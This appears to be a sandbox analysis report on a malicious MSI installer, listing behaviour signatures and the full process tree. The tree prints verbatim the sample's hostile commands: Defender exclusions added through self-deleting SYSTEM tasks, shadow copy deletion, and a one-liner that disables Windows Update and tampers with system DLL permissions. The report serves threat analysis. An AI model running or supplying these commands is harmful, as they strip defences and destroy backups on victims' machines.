Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    03/08/2026, 04:17

General

  • Target
    install_upr010.msi
  • Size 6.8MB
  • Sample260803-ewfreaybqa
  • SHA256 0d6bea573c356522d3981523c4d66c39c3bddc65103f542a4e8f6cf499ef5592
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 27 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_upr010.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4800
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3320
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5720
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 93E1756D3AB13E84ADE4BF5F3E0AAFC8 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:1016
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:2276
  • C:\Users\Public\wARGav\EydnEY.exe
    C:\Users\Public\wARGav\EydnEY.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1300
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\wARGav\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4904
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\wARGav\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:208
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:3776
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2260
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:3016
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3696
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2496
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:2440
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:628
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:640
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4756
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1452
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:3752
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1320
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:5828
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:3460
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:4804
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4640
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4652
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4680
                        • C:\Program Files (x86)\FKOGrh\FKOGrh.exe
                          "C:\Program Files (x86)\FKOGrh\FKOGrh.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:3232
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3000
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:1472
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\FKOGrh" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1840
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:2480
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\FKOGrh\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5228
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\FKOGrh\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1320
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5320
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                                PID:5492
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:4144
                              • C:\Windows\SysWOW64\net.exe
                                net stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3172
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                    PID:4476
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:3260
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure wuauserv reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4336
                                • C:\Windows\SysWOW64\net.exe
                                  net stop UsoSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:6128
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop UsoSvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3648
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config UsoSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:1912
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure UsoSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:5300
                                • C:\Windows\SysWOW64\net.exe
                                  net stop uhssvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5560
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop uhssvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4716
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config uhssvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4596
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure uhssvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4520
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WaaSMedicSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3088
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WaaSMedicSvc
                                    5⤵
                                      PID:1904
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WaaSMedicSvc start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:5256
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc failure WaaSMedicSvc reset= 0 actions= ""
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:5340
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:2840
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:3776
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:2164
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:5796
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /f C:\Windows\System32\wuaueng.dll
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:436
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1388
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:3516
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:4000
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:6028
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3636
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                    4⤵
                                      PID:5652
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      PID:4852
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo.>c:\xxxx.ini
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:1388
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo.>c:\xxxx.ini
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:5184
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:112
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4544
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3796
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2544
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo.>c:\xxxx.ini
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:2880
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo.>c:\xxxx.ini
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:4872
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:5668
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4064
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1180
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2952
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:1656
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4992
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                        PID:2044
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:440
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • Suspicious use of WriteProcessMemory
                                      PID:4648
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3788
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1980
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5356
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:5612
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:5924
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of WriteProcessMemory
                                      PID:4060
